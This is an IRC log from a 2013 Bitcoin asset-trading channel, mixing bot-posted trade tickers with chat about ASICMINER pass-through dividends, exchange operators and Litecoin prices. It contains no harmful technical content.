high-volume market moving news feed. We scrape data from hundreds of news sites, twitter, forums, and company blogs. The data delivered will be highly processed. Features will include summarization, entity recognition, topic recognition, and sentiment analysis. We also can assist in platform integration (UI and API). If you are interested in integrating our data feed, please fee May 17 20:10:05 lol May 17 20:10:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.01841 = 0.1841 BTC [-] May 17 20:11:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.01839 = 0.0368 BTC [-] May 17 20:11:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.01839 BTC [-] May 17 20:12:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.01839 = 0.0552 BTC [-] May 17 20:14:38 https://bitcointalk.org/index.php?topic=99497.msg2182646#msg2182646 --- furuknap u better ask him to show his math on that one May 17 20:15:22 Hehe :-D May 17 20:15:35 Even you won't be _that_ crazy... May 17 20:16:31 indeed! May 17 20:18:07 [BTCTC] [COGNITIVE] 3 @ 0.22999 = 0.69 BTC [+] May 17 20:19:04 mircea_popescu >> Oh nice! Bitcoin stocks on MPEX was something we were looking at integrating eventually. May 17 20:19:06 hehe May 17 20:19:16 [BTCTC] [TAT.ASICMINER] 25 @ 0.01839 = 0.4598 BTC [-] May 17 20:19:28 who's that ? May 17 20:19:45 some guy from zeroblock.com May 17 20:20:11 TAT, could you tell me so I don't have to calculate myself, how much you get from the 5% in dividends on AM-PT? May 17 20:20:12 aha... May 17 20:20:16 i dunno what that even is ;/ May 17 20:20:54 i get 5% May 17 20:21:07 No shit... What's that in BTC, then... May 17 20:21:18 it changes every week May 17 20:21:26 roughly speaking about .001 btc May 17 20:21:33 it's very small May 17 20:21:46 From the entire PT? Geez. May 17 20:22:11 peoplethink of it like 5% of share value May 17 20:22:20 but its nowhere near that May 17 20:22:33 way smaller May 17 20:22:34 I realize it's just the dividends. Thought it had higher volumes. May 17 20:23:12 id need like 5000-10000 for it to even be notable May 17 20:23:31 we're at like 1000 May 17 20:23:57 ?? Isn't there around 10K on Bitfunder and 30K on BTCT? May 17 20:24:12 those are no fee May 17 20:24:19 and not run by me May 17 20:24:41 https://btct.co/security/TAT.ASICMINER <- Outstanding 28691 May 17 20:24:49 i only run the fractional pt s May 17 20:24:54 /100 May 17 20:24:59 125 May 17 20:25:06 Ah, you're talking shares, not fractions. Got it. May 17 20:26:05 10000 TAT ASICM = 100 ASICM = 3 BTC. x5% = 0.15 BTC or 18 dollars May 17 20:26:12 He has to sell a lot May 17 20:26:17 and 125 wall is down, fuck yeah May 17 20:26:21 and 3 BTC is the last dividend which was high May 17 20:26:41 thats one aspect that frustrates me a bit May 17 20:26:45 uh? May 17 20:26:49 is people make a big deal about the 5% May 17 20:26:49 125 is far from being down May 17 20:26:52 120 is May 17 20:26:55 has been for a while May 17 20:26:59 but it's nothing May 17 20:27:08 they dont grasp the math May 17 20:27:09 Wait... it is May 17 20:27:15 It's slow on the updating here May 17 20:27:15 125 is down May 17 20:27:20 $1M buy May 17 20:27:23 went off May 17 20:27:25 wow May 17 20:27:29 Yeah, I just thought it was way bigger in volume. May 17 20:27:34 the 118 bidwall is down May 17 20:27:37 too May 17 20:27:44 From the entire PT? Geez. << no dude. dividend was like 2%. he gets 1/20 iof that May 17 20:28:04 so 1 per thousand. if he has 1k btc total float 1 btc May 17 20:28:09 furuknap, I actually recall you were the fist one to give me shit about it May 17 20:29:05 Yeah, because the volume should be much higher. I realize it didn't become as huge as when I suggested it. May 17 20:29:07 i still see the 118 bid wall ? May 17 20:29:26 bugpowder do you have me on ignore? May 17 20:29:33 nope May 17 20:30:00 wall at 118 used to be 10k May 17 20:30:01 what volume should be higher? May 17 20:30:07 wtf why did nam world say 125 is far from being dow, when it was gone? May 17 20:30:10 just the wall itself May 17 20:30:18 different sites are lagging May 17 20:30:30 5% of divs is entirely disproportionate a same to worry about considering the share value May 17 20:30:37 i see, lag... May 17 20:30:41 [BTCTC] [TAT.ASICMINER] 50 @ 0.018312 = 0.9156 BTC [-] May 17 20:30:44 do math on if i had 5000 whole-shares May 17 20:30:46 hmm i wonder if my having fiber is an edge :/ May 17 20:30:49 and what those are worth May 17 20:30:55 vs 5% of divs May 17 20:31:00 [BTCTC] [ASICMINER-PT] 1 @ 1.8722 BTC [+] May 17 20:31:15 [BTCTC] [TAT.ASICMINER] 20 @ 0.018311 = 0.3662 BTC [-] May 17 20:31:46 [MPEX] [S.MPOE] 7850 @ 0.00066943 = 5.255 BTC [-] May 17 20:32:03 Well, there is a major difference betwen being a PT operator and holding shares. You can be a PT operator and not hold a single share yourself. May 17 20:32:54 can you? May 17 20:33:06 if i hold 5000 shares for the PT May 17 20:33:17 nake short selling for the wi! May 17 20:33:17 i'm still responsible for $1m worth of assets May 17 20:33:18 Of course you can. Why wouldn't you? May 17 20:33:22 naked* May 17 20:33:29 win* May 17 20:33:42 none of this is naked May 17 20:33:49 I hope not :-) May 17 20:33:54 just ask mp how profitable selling short 40,000 btc worth of pirate shit would ahve been worth. May 17 20:33:54 it's all provable May 17 20:34:02 I posted my transparency report May 17 20:34:14 no other PT operator does that May 17 20:34:25 go ahead and ask DT and Burnside to show their shares May 17 20:34:31 I'd be interested to see em May 17 20:34:38 Of course, I have no reason not to trust you, but you still don't have to hold personal shares, which is totally different from holding shares from someone else and routing the dividends. May 17 20:34:51 indeed May 17 20:34:57 but still a large liability May 17 20:35:00 I understand there is work involved, but I saw the regular PT numbers and thought it would be much more interest in the 100PTs. May 17 20:35:17 the PTs that charge no fee May 17 20:35:21 are gamed May 17 20:35:27 essentially May 17 20:35:35 DT gets something out of the deal May 17 20:35:38 we just dont know what May 17 20:35:41 Actually burnside reaps from trading because it is his exchange. May 17 20:35:47 yep May 17 20:35:50 but May 17 20:35:58 AM has been very, very profitable for him. That's why he took the fee away. May 17 20:35:58 large conflict of interest there no? May 17 20:36:13 he can game things from within May 17 20:36:16 Of course there is, but he's very clear about it. May 17 20:36:20 oh, i know burnside has a significant number of shares May 17 20:36:28 i sold them and had friedcat send them to him personally May 17 20:36:38 doesnt mean he still holds them May 17 20:36:47 he could have sold 2 or 3 times what i sent, but i know he has many many many May 17 20:37:05 I'm not accusing so much as saying I think they SHOULD show proof May 17 20:37:19 yeah, iv wondered about this too May 17 20:37:25 Burnside would pass off his PT if it didnt have to be no-fee May 17 20:37:28 but really... have to read the contract May 17 20:37:36 some times naked short selling is fine May 17 20:37:40 but bitfunder painted him into a corner May 17 20:37:42 being no fee May 17 20:38:02 so DT must be getting something out of it May 17 20:38:12 he just wanted to keep people on his exchange, as he knew AM was the best hing evar May 17 20:38:17 right May 17 20:38:18 he had the first PT thanks to me May 17 20:38:25 but DT does all the work May 17 20:38:37 and trust me, there's work May 17 20:38:47 DT has nothing to do with burnside May 17 20:38:55 I think I heard why DT runs his PT for free sometime, but can't for the life of me remember what it was. May 17 20:38:59 talking about BF chaang May 17 20:39:05 ahh May 17 20:39:15 DT did it for free cuz ukto helped out DT in the past May 17 20:39:18 if BF didnt start with no-fee May 17 20:39:19 paying back a favour May 17 20:39:24 Burnside wouldnt have done no-fee May 17 20:39:26 we just dont know what << funny cause i'm just writing an article sort of on the topic May 17 20:39:28 be about 10 mins May 17 20:39:28 TAT i know May 17 20:39:48 mp, spreading fud, awesome :) May 17 20:39:54 hehe May 17 20:40:03 as i see it May 17 20:40:06 it's unhealthy May 17 20:40:09 to do no-fee May 17 20:40:19 it starts bad trends May 17 20:40:22 I agree, and to me, it's a red flag. May 17 20:40:25 he gets a fee by having people lose a percent on every buy and sell May 17 20:40:26 like exchanges running their own PT May 17 20:40:29 kickbacks May 17 20:40:30 etc May 17 20:40:31 also people join his exchange May 17 20:40:51 if your operators dont have incentive May 17 20:40:55 theyll find it elsewhere May 17 20:41:00 he tried to get me to run the pt but i would not do it being a us site and all May 17 20:41:13 PT DT? May 17 20:41:29 i guess i better fix my cookie May 17 20:41:30 he talked to me personally,as im the guy who cooked him up so he could do it,. he just wanted it on his exchang first May 17 20:41:47 taub pass though deadterra May 17 20:41:54 i started mine with shares i actually held May 17 20:41:59 no if/then deals May 17 20:42:04 [HAVELOCK] [VTX] 1 @ 0.4299 BTC [-] May 17 20:42:12 ah May 17 20:42:16 he had an options contract with me held by jahn the dong May 17 20:42:33 whats with that wall at $125 May 17 20:42:46 the only question was if friedcat would move them or not May 17 20:42:57 krs1 wall is dead May 17 20:43:04 hmm May 17 20:43:10 or you mean the buy wall? May 17 20:43:19 the wall from 118 went to 125 May 17 20:43:33 oh ok May 17 20:43:39 now its gone May 17 20:43:45 122.22 again May 17 20:44:13 no one is seeing the same market at the same time, crazy shit May 17 20:44:18 http://blockchained.com/depth_mtgox_15d.png May 17 20:44:20 fun. May 17 20:44:58 ;;asks 200 May 17 20:45:00 yes kako :) May 17 20:45:08 ;bids 100 May 17 20:45:11 Gribble is dead. May 17 20:45:14 oh May 17 20:45:18 the best is the asks May 17 20:45:27 munch munch May 17 20:45:37 you mean choo choo motherfucker! May 17 20:45:48 you mean fyl chickun ? May 17 20:46:20 fly chikun in flight, afternoon delight May 17 20:46:23 that is for ltc May 17 20:46:33 choo choo motherfucker is for btc May 17 20:46:46 Uhm... Did LTC just have a rocket up its ass? May 17 20:46:51 kako, keep uo with the almost weekly changing slang May 17 20:47:11 ltc is about where it was a day ago May 17 20:47:16 ltc is down from a week ago May 17 20:47:32 well Chaang-Noi thanks for providing slang updating service May 17 20:47:51 Actually, it's up about 10% vs BTC and 20% vs USD just in a couple of hours on BTCE. May 17 20:47:53 np May 17 20:48:50 Dammit! I just sold one of my GPUs to buy LTC and didn't get the cash in time. May 17 20:48:57 LTC is a joke May 17 20:49:09 bubble in a bubbl May 17 20:49:32 Then you stay away, problem solved :-) May 17 20:49:33 yes, ltc is a joke, a joke so funny i made $500,000 May 17 20:49:57 iv made so much more off of ltc than btc May 17 20:50:56 dat book ratio May 17 20:51:20 dominos is slinging pizza-flavored DVDs May 17 20:51:24 ThickAsThieves http://trilema.com/2013/bringing-forth-the-light-of-holy-economy/ May 17 20:52:03 two new coins at btce... May 17 20:52:10 ftc and cnc what hte fug May 17 20:52:23 off to bed, night all May 17 20:54:11 [BTCTC] [ESECURITYSABTC] 1 @ 0.32275 BTC [-] May 17 20:54:40 so far I love "I can’t have fun behaving uneconomically." May 17 20:55:05 it's basically the same idea, "crafting is for fun not for making tria" vs "running pts is for fun not for making btc" May 17 20:55:25 people are very much used to this basically nonsensical crap they spend their life in cause it's "easier" May 17 20:57:32 ;;ticker May 17 20:57:48 Gribble dead. May 17 20:58:02 It's roughly 125, tho... May 17 20:58:04 :-) May 17 20:58:44 griblebackup ? please May 17 20:58:49 mp, the article is funny, but i was anticipating someting more directly bitcoin-provocative :( May 17 20:59:33 like "hey fuckface, show me the fucking proof and tell me all ur backroom dealz nao!" May 17 21:00:13 or waxing on why no-fee is bad for bitcoin investing May 17 21:00:22 i guess i'm free to write my own shit May 17 21:02:17 [BTCTC] [ASICMINER-PT] 1 @ 1.8745 BTC [+] May 17 21:03:35 [BTCTC] [ASICMINER-PT] 1 @ 1.87475 BTC [+] May 17 21:03:50 [BTCTC] [ASICMINER-PT] 2 @ 1.875 = 3.75 BTC [+] May 17 21:04:04 [BTCTC] [ASICMINER-PT] 4 @ 1.875 = 7.5 BTC [+] May 17 21:04:08 [BTCTC] [ASICMINER-PT] 5 @ 1.879 = 9.395 BTC [+] May 17 21:04:22 [BTCTC] [ASICMINER-PT] 3 @ 1.87998 = 5.6399 BTC [+] May 17 21:04:23 ThickAsThieves gegege May 17 21:06:45 [BTCTC] [PAJKA.BOND] 1 @ 0.1049 BTC [+] May 17 21:07:50 [BTCTC] [PAJKA.BOND] 10 @ 0.105 = 1.05 BTC [+] May 17 21:08:59 [BTCTC] [TAT.ASICMINER] 100 @ 0.01839 = 1.839 BTC [+] May 17 21:11:40 [BTCTC] [ASICMINER-PT] 5 @ 1.4 = 7 BTC [-] May 17 21:12:04 [HAVELOCK] [SDICE] 7 @ 0.2202 = 1.5414 BTC [+] May 17 21:12:05 [HAVELOCK] [SDICE] 2 @ 0.220101 = 0.4402 BTC [-] May 17 21:12:07 [HAVELOCK] [SDICE] 11 @ 0.22 = 2.42 BTC [-] May 17 21:14:04 [HAVELOCK] [SDICE] 9 @ 0.22 = 1.98 BTC [-] May 17 21:14:39 [BTCTC] [TAT.ASICMINER] 9 @ 0.01839 = 0.1655 BTC [+] May 17 21:16:04 [HAVELOCK] [ASICM] 28 @ 0.0183 = 0.5124 BTC [-] May 17 21:16:06 [HAVELOCK] [ASICM] 205 @ 0.01830101 = 3.7517 BTC [+] May 17 21:16:07 [HAVELOCK] [ASICM] 20 @ 0.018301 = 0.366 BTC [-] May 17 21:16:08 [HAVELOCK] [ASICM] 315 @ 0.01830001 = 5.7645 BTC [-] May 17 21:16:08 [HAVELOCK] [ASICM] 432 @ 0.0183 = 7.9056 BTC [-] May 17 21:16:47 [BTCTC] [ASICMINER-PT] 1 @ 1.8795 BTC [+] May 17 21:17:06 [BTCTC] [TAT.ASICMINER] 99 @ 0.01849 = 1.8305 BTC [+] May 17 21:19:43 [BTCTC] [ASICMINER-PT] 10 @ 1.8795 = 18.795 BTC [+] May 17 21:20:04 [HAVELOCK] [ASICM] 60 @ 0.0183 = 1.098 BTC [-] May 17 21:20:06 [HAVELOCK] [ASICM] 40 @ 0.0183 = 0.732 BTC [-] May 17 21:20:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.01849 = 0.0925 BTC [+] May 17 21:23:56 [BTCTC] [ASICMINER-PT] 1 @ 1.84 BTC [-] May 17 21:27:19 [BTCTC] [GSDPT] 13 @ 0.002789 = 0.0363 BTC [+] May 17 21:30:34 mircea_popescu: maybe you can help him? http://blog.dwolla.com/i-want-to-work-with-more-women/ May 17 21:30:59 i can, which doesn't mean i will. May 17 21:32:04 http://youtu.be/NlwGP4VhkWA May 17 21:32:50 anyway, the reason \women don't work for him is cause he's a creepy looking dude. May 17 21:32:55 (i asked my own hr) May 17 21:33:11 what a weird blog May 17 21:33:19 [BTCTC] [ASICMINER-PT] 1 @ 1.8798 BTC [+] May 17 21:33:25 " I’m trying to see if you’re building something and if so, on what, for whom, so I can figure out how to find you." May 17 21:33:31 good luck, buddy! May 17 21:33:52 and yeah, he writes the creepiest shit too May 17 21:34:23 what if the woman wants you to be her dominant partner May 17 21:34:29 and she wants to be the sub May 17 21:34:33 no kissing May 17 21:34:36 from comments: May 17 21:34:39 "This is amazing, thanks for posting this Ben! If Dwolla was located in Chicago I'd be applying for a front-end dev job right now." May 17 21:34:58 'front end dev' is that what they call it these days ;) May 17 21:35:00 [BTCTC] [COGNITIVE] 2 @ 0.22999 = 0.46 BTC [+] May 17 21:35:21 i think she means front end loading May 17 21:35:25 as in, no anal. May 17 21:35:28 It is. Quite common term, actually. It's all HTML5 and moving things and stuff. May 17 21:35:36 it was a joke furuk May 17 21:35:41 I realize that. May 17 21:35:48 i'll stick to my day job May 17 21:35:59 boom-tssss May 17 21:36:39 [BTCTC] [GSDPT] 9 @ 0.002789 = 0.0251 BTC [+] May 17 21:36:43 comment from a male May 17 21:36:46 "Possibly put an intern or Jenna (if she has time) on reach out duty" May 17 21:37:00 hehe May 17 21:37:11 okay i'll stop being a 13yo May 17 21:38:11 oh furuknap, look at this horrible math error https://bitcointalk.org/index.php?topic=99497.msg2183514#msg2183514 May 17 21:38:32 he thinks max share price for 1 share is all bitcoins May 17 21:38:43 I think he missed something there May 17 21:39:05 [HAVELOCK] [ASICM] 11 @ 0.0186 = 0.2046 BTC [+] May 17 21:39:33 I think a lot of the people right now are missing something, possibly vital too. May 17 21:39:37 even impossible if you divide by 400k May 17 21:40:04 [HAVELOCK] [ASICM] 1 @ 0.0186 BTC [+] May 17 21:42:55 [BTCTC] [TAT.ASICMINER] 39 @ 0.01849 = 0.7211 BTC [+] May 17 21:43:22 [BTCTC] [ASICMINER-PT] 1 @ 1.841 BTC [-] May 17 21:43:26 [BTCTC] [ASICMINER-PT] 1 @ 1.84 BTC [-] May 17 21:44:40 [BTCTC] [TAT.ASICMINER] 5 @ 0.01832 = 0.0916 BTC [-] May 17 21:44:59 [BTCTC] [TAT.ASICMINER] 50 @ 0.0183 = 0.915 BTC [-] May 17 21:51:21 [BTCTC] [ASICMINER-PT] 1 @ 1.8725 BTC [+] May 17 21:53:23 [BTCTC] [ASICMINER-PT] 4 @ 1.8725 = 7.49 BTC [+] May 17 21:53:49 [BTCTC] [TAT.ASICMINER] 20 @ 0.01821 = 0.3642 BTC [-] May 17 21:57:27 Damn, I so want to publish my numbers and model. I'll hold back, though. If I'm right, it's easily proven after the fact. If I'm wrong, it won't help anyone. May 17 22:01:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.01821 BTC [-] May 17 22:02:16 you can always share here May 17 22:02:26 it's not quite like broadcasting n forums May 17 22:02:42 its not like we have a log or anything. May 17 22:03:07 Heh, yeah, that'd stay secret for about, I don't know, 10ns? May 17 22:04:24 didn't know it was an all-out "secret" May 17 22:04:29 insider information welcomed anytime in #bitcoin-assets! May 17 22:04:41 ^ May 17 22:05:14 no regulators here, just friendlies May 17 22:06:09 It's not a 'secret' per se, but if I'm right and publish in advance, I'll just be charged with trying to manipulate the price. I have no intention of manipulating anything. I have no insider information, just an analysis that shows there is no way for investors to recouperate their investments at these levels. May 17 22:06:18 you have 10ns ping? /me want May 17 22:06:41 Besides, it's mostly targeted at surviving 2016. Most 'investors' now don't see past the next dividend. I doubt it will help anyone. May 17 22:07:52 bitcoin pensionary fund operators might be interested May 17 22:08:31 ;;next May 17 22:10:09 It's really not that complicated. It makes a couple of assumptions. 1) With the current dividend level, AM will focus solely on churning out cash, not preparing for 2016 halving, and 2) in 2016 due to halving of revenue, share prices will halve too. If those assumptions are correct, you simply divide half the current share price over the number of weeks or months, subtract that from the dividend based on expected hashrate (whi May 17 22:10:44 vh May 17 22:10:55 furuknap : make a statement of it, publish the hash of it May 17 22:11:00 then later you can publish the statement May 17 22:11:40 maybe also publish the wordcount, just in case kids don't comprehend hashing. May 17 22:11:47 I was thinking something like that, but really, is isn't required. The numbers won't change so they are the same in three months or a year and will just show the same results. May 17 22:11:59 you got cut May 17 22:12:05 [BTCTC] [ASICMINER-PT] 1 @ 1.872 BTC [-] May 17 22:12:06 > subtract that from the dividend based on expected hashrate (whi May 17 22:12:10 [BTCTC] [ASICMINER-PT] 1 @ 1.8725 BTC [+] May 17 22:12:19 subtract that from the dividend based on expected hashrate (which technically is also an assumption). May 17 22:12:31 [BTCTC] [ASICMINER-PT] 2 @ 1.8725 = 3.745 BTC [+] May 17 22:13:05 no mining asset halved during the reward halving May 17 22:14:20 what's so bad about being charged with manipulating the price May 17 22:14:22 That's why it's an assumption, but really, AM must double their network percentage to maintain the same dividends. AM wasn't paying mining-based dividends at anything close to what they're expecting over the next years. May 17 22:14:48 i doubt price formation has much to do with any sort of rational thinking. May 17 22:14:58 mining turds never repay May 17 22:15:06 got to get out early May 17 22:15:08 the main components are 1. people wish to participate, they see mining as participation, they can't afford rigs so this is the next best May 17 22:15:08 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1955 = 0.391 BTC [-] May 17 22:15:11 Oh, I agree. People bay hundreds of dollars for an iPhone and that is just a piece of shit. May 17 22:15:13 and you seem to imply that AM will be around in unchanged form 3 years from now, and also we won't increase blocksize (and thus txfees). which is pretty unlikely. May 17 22:15:27 2. people wish to be "together", this is like the one thing where they can be together May 17 22:15:34 "so guise, do you think price is going up" May 17 22:15:35 The model actually assumes a certain block size increase. May 17 22:15:47 it's like birds chipring to one another "op there's many of us we'll be safe chirp chirp" May 17 22:15:49 [BTCTC] [CRYPTO-TRADE] 1 @ 0.191001 BTC [-] May 17 22:15:50 supernodes are pumping the price May 17 22:15:52 fuck supernodes, man May 17 22:15:53 Yeah, and that herd is driving the price now, not anything fndamental. May 17 22:16:40 jurov not increasing blocksize is what increases fees. May 17 22:16:41 Really, it doesn't bother me if people mindlessly run in one direction, but I'm somewhat bothered by having information that may help people not get burned. If they still want to stampede, fine. May 17 22:17:10 [BTCTC] [CRYPTO-TRADE] 3 @ 0.191 = 0.573 BTC [-] May 17 22:17:43 so publish it May 17 22:17:45 I doubt very many people realize all the factors in evaluating AM sustainability and are just seeing huge dividends, expecting that to stick around forever. May 17 22:18:00 I think your ideas are riddled with assumptions May 17 22:18:03 pics or didn't happen May 17 22:18:08 where is tiberiusv May 17 22:18:26 mircea_popescu: that remains to seen whether the demand is really so elastic. May 17 22:18:29 One doesn't just assume in bitcoin May 17 22:18:53 jcpham: banned May 17 22:19:00 drats May 17 22:19:06 a number of your assumptions are also in contrast with known history May 17 22:19:31 making them that much more potentially "wild" May 17 22:19:41 that said May 17 22:19:49 I could use a little dip in the price May 17 22:19:51 so fire away May 17 22:20:27 we need soros-level analysis instead of these maff nerds May 17 22:20:37 he claims to take irrationality into account May 17 22:21:10 and hype May 17 22:21:34 [BTCTC] [ASICMINER-PT] 1 @ 1.845 BTC [-] May 17 22:21:35 seems to work for him May 17 22:22:23 At some point, someone will do that math. Bitcoin mining is quite predictable due to its finite reward. If we had inflation, this wouldn't be a problem. May 17 22:23:49 lol do tell me, i sell diff derivatives. but btc price is pretty much not predictable, and it affects am much. May 17 22:24:08 what if in 3 years, 80% of AM revenue is hardware sales May 17 22:24:48 what if in 2 years AM sells the company at a 25% premium? May 17 22:25:04 TAT: Yeah, that could be a solution, but to do that, there would need to be funds for research, production, marketing, etc, etc, etc. Right now, it doesn't seem like friedcat is willing to think that far ahead. May 17 22:25:21 where did you get that impression? May 17 22:25:24 They may sell, but they'll sell to someone far better at math than me. May 17 22:26:00 surely they would not sell to a mathematician May 17 22:26:11 $oi May 17 22:26:14 $oix May 17 22:26:18 From pouring out as much dividend as possible. I'm not saying "No" to dividends, I'm saying a pile of cash in the hands of friedcat is better at ensuring sustainability than a ton of dimes in the hands of thousands of investors. May 17 22:26:27 !ticker m ^oix May 17 22:26:28 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) May 17 22:26:35 O.o May 17 22:26:35 they do not always pay out 100% divs May 17 22:26:42 they have retained much May 17 22:26:57 and will retain in the future May 17 22:27:04 they just didnt this week May 17 22:27:14 They wouldn't have to pay half that. People don't seem to realize that not paying dividends doesn't mean the money is burned in a forge. May 17 22:27:33 i dont think you are listening May 17 22:27:45 they have reserves May 17 22:27:50 and add to them some weeks May 17 22:28:01 just not all weeks May 17 22:28:58 they are planning next-gen already May 17 22:29:19 they are planning 1000TH before year's end as a conservative goal May 17 22:29:23 I know that has been said. I haven't been able to figure out how much. May 17 22:29:36 you probably could May 17 22:29:44 would take digging May 17 22:29:52 Well, it's really moot. I'll have my models in a year too, and even longer :-) May 17 22:31:58 [BTCTC] [ASICMINER-PT] 2 @ 1.8724 = 3.7448 BTC [+] May 17 22:32:37 $avg May 17 22:32:38 [BTCTC] [ASICMINER-PT] 3 @ 1.8724 = 5.6172 BTC [+] May 17 22:32:39 jurov: 117.10 May 17 22:34:39 BTW, out of curiosity, if there came a tender offer on AM, how would the PTs handle that? Vote? May 17 22:35:03 my PT has no voting rights May 17 22:35:23 I dont think AM shares have them either May 17 22:35:23 That's my point. I'm sure the buyer would want to know whether they could buy... May 17 22:35:39 probably a board decision May 17 22:35:49 Board can't decide whether someone sells. May 17 22:36:25 my PT acts in kind with the underlying asset May 17 22:36:33 if AM sold May 17 22:36:44 there would be a mass buyback May 17 22:37:18 Hm... May 17 22:38:49 If there was a forced buy-back... By whose authority would that happen? It would be according to Chinese law, I would presume. However, since the PT-holder don't hold shares, the buyback would be against the PT operator. May 17 22:39:14 I need to get to bed, I'm seeing wafer designs on the inside of my eyelids. May 17 22:39:19 Talk to you guys another day. May 17 22:40:02 [BTCTC] [TAT.ASICMINER] 13 @ 0.0182 = 0.2366 BTC [-] May 17 22:40:08 [BTCTC] [TAT.ASICMINER] 200 @ 0.0182 = 3.64 BTC [-] May 17 22:45:05 [HAVELOCK] [ASICM] 200 @ 0.01855 = 3.71 BTC [-] May 17 22:45:12 mircea_popescu: where is mpoe bot? May 17 22:45:42 mmm May 17 22:45:54 smickles_ runs him May 17 22:46:07 smickles_ abducted him? May 17 22:46:18 prolly connectivity issues ? May 17 22:46:36 [MPEX] [S.MPOE] 3400 @ 0.00066943 = 2.2761 BTC [-] May 17 22:46:56 $avg works May 17 22:47:18 i hope May 17 22:47:20 $avg May 17 22:47:23 jurov: 117.10 May 17 22:47:40 ok so then what's the problem May 17 22:47:40 makomk malaimo maximian metabyte_ midnightmagic MiningBuddy- mircea_popescu mjr_ mjr___ mod6 mpexbot May 17 22:47:41 makomk malaimo maximian metabyte_ midnightmagic MiningBuddy- mircea_popescu mjr_ mjr___ mod6 mpexbot May 17 22:48:09 ic, i can create any options i want and sell to myself. all solved. May 17 22:55:08 huh ?! May 17 22:55:57 definitely May 17 22:58:21 [BTCTC] [ASICMINER-PT] 1 @ 1.872499 BTC [+] **** BEGIN LOGGING AT Fri May 17 23:04:38 2013 May 17 23:05:13 Coinroll really getting a good betting volume. And it won't IPO =/ May 17 23:06:38 truffles IPO your booze then May 17 23:07:10 should appreciate over time... but delivery of dividends would be problematic May 17 23:07:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.01821 = 0.0364 BTC [+] May 17 23:07:29 I'd totally invest in your booze, truffles May 17 23:07:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.01821 = 0.0911 BTC [+] May 17 23:07:35 maybe ThickAsThieves could figure passthrough :DDDD May 17 23:09:00 [BTCTC] [ASICMINER-PT] 1 @ 1.8725 BTC [+] May 17 23:09:46 [BTCTC] [ASICMINER-PT] 2 @ 1.8797 = 3.7594 BTC [+] May 17 23:10:20 i love the sierrachart jabs at mtgox May 17 23:10:36 >Interesting. Never heard of such a concept when it comes to trading. We would think that immediate execution should always be achieved as much as possible. May 17 23:10:58 taub context ? May 17 23:11:05 regarding the goxlag May 17 23:11:10 o May 17 23:11:13 http://www.sierrachart.com/SupportBoard.php?ThreadID=527 May 17 23:11:57 and that other one regarding socket io May 17 23:11:57 We see that the MTGox data feed is not entirely reliable and also from an engineering perspective, its technical implementation really is very confusing and not well structured. They are using what is called a web socket and then on top of that Socket I/O . This is unnecessary and the method by which this is implemented is not technically correct. So we are not very impressed with the MTGox data feed. This is just a comment. May 17 23:12:14 jcpham: homemade rye is nice as long as the rye is in moderation May 17 23:12:34 i like a strong pale May 17 23:12:40 like hops too May 17 23:12:54 homebrewing is legal now as of a few days ago May 17 23:13:01 thinking about starting May 17 23:13:16 i'm searching for the perfect porter - that balances hops and sweetness May 17 23:13:50 [BTCTC] [ASICMINER-PT] 1 @ 1.8797 BTC [+] May 17 23:16:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.01821 BTC [+] May 17 23:16:14 it's funny the things the state tries to regulate May 17 23:17:02 http://www.reddit.com/r/Bitcoin/comments/1ejcul/6k_invested_in_the_asicminer_ipo_would_value_12m/ May 17 23:17:02 [HAVELOCK] [ASICM] 100 @ 0.01855 = 1.855 BTC [-] May 17 23:17:08 funny i sold yesterday May 17 23:17:12 ho hum May 17 23:17:29 damn these asics May 17 23:17:32 nope May 17 23:18:08 lol noobs and their issues. always funny. May 17 23:20:02 [HAVELOCK] [ASICM] 10 @ 0.0186 = 0.186 BTC [+] May 17 23:24:53 [BTCTC] [ASICMINER-PT] 2 @ 1.8798 = 3.7596 BTC [+] May 17 23:28:23 [BTCTC] [S.DICE-PT] 5 @ 0.002577 = 0.0129 BTC [+] May 17 23:29:59 [BTCTC] [S.DICE-PT] 88 @ 0.002578 = 0.2269 BTC [+] May 17 23:31:29 [BTCTC] [S.DICE-PT] 140 @ 0.002589 = 0.3625 BTC [+] May 17 23:33:02 [BTCTC] [TAT.ASICMINER] 6 @ 0.01821 = 0.1093 BTC [+] May 17 23:36:09 [MPEX] [S.MPOE] 4321 @ 0.00066701 = 2.8822 BTC [-] May 17 23:36:11 [MPEX] [S.MPOE] 10000 @ 0.000667 = 6.67 BTC [-] May 17 23:36:13 [MPEX] [S.MPOE] 2979 @ 0.00066578 = 1.9834 BTC [-] May 17 23:37:52 [BTCTC] [TAT.ASICMINER] 29 @ 0.01821 = 0.5281 BTC [+] May 17 23:38:49 [BTCTC] [ASICMINER-PT] 1 @ 1.8798 BTC [+] May 17 23:42:02 [HAVELOCK] [ASICM] 5 @ 0.0186 = 0.093 BTC [+] May 17 23:43:25 [BTCTC] [TAT.ASICMINER] 35 @ 0.01821 = 0.6374 BTC [+] May 17 23:45:30 [BTCTC] [GSDPT] 5 @ 0.002789 = 0.0139 BTC [+] May 17 23:47:01 [BTCTC] [TAT.ASICMINER] 44 @ 0.01849 = 0.8136 BTC [+] May 17 23:48:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.01849 BTC [+] May 17 23:48:22 [MPEX] [S.MPOE] 4850 @ 0.00066984 = 3.2487 BTC [+] May 17 23:48:24 [MPEX] [S.MPOE] 1694 @ 0.00067238 = 1.139 BTC [+] May 17 23:50:03 [HAVELOCK] [ASICM] 55 @ 0.0186 = 1.023 BTC [+] May 17 23:51:03 [HAVELOCK] [ASICM] 2 @ 0.0186 = 0.0372 BTC [+] May 17 23:52:03 [HAVELOCK] [ASICM] 1 @ 0.0186 BTC [+] May 17 23:53:03 [HAVELOCK] [HIM] 1 @ 2.0399 BTC [+] May 17 23:53:07 http://quantabytes.com/articles/report-for-day-zero-of-bitcoin-2013-the-future-of-payments May 17 23:53:11 mircea_popescu, May 17 23:53:25 "Wences Casares, founder of Lemon" May 17 23:53:39 yea ? May 17 23:53:52 did you know that May 17 23:54:03 the rota case guy runs a wallet May 17 23:54:05 http://lemon.com/ May 17 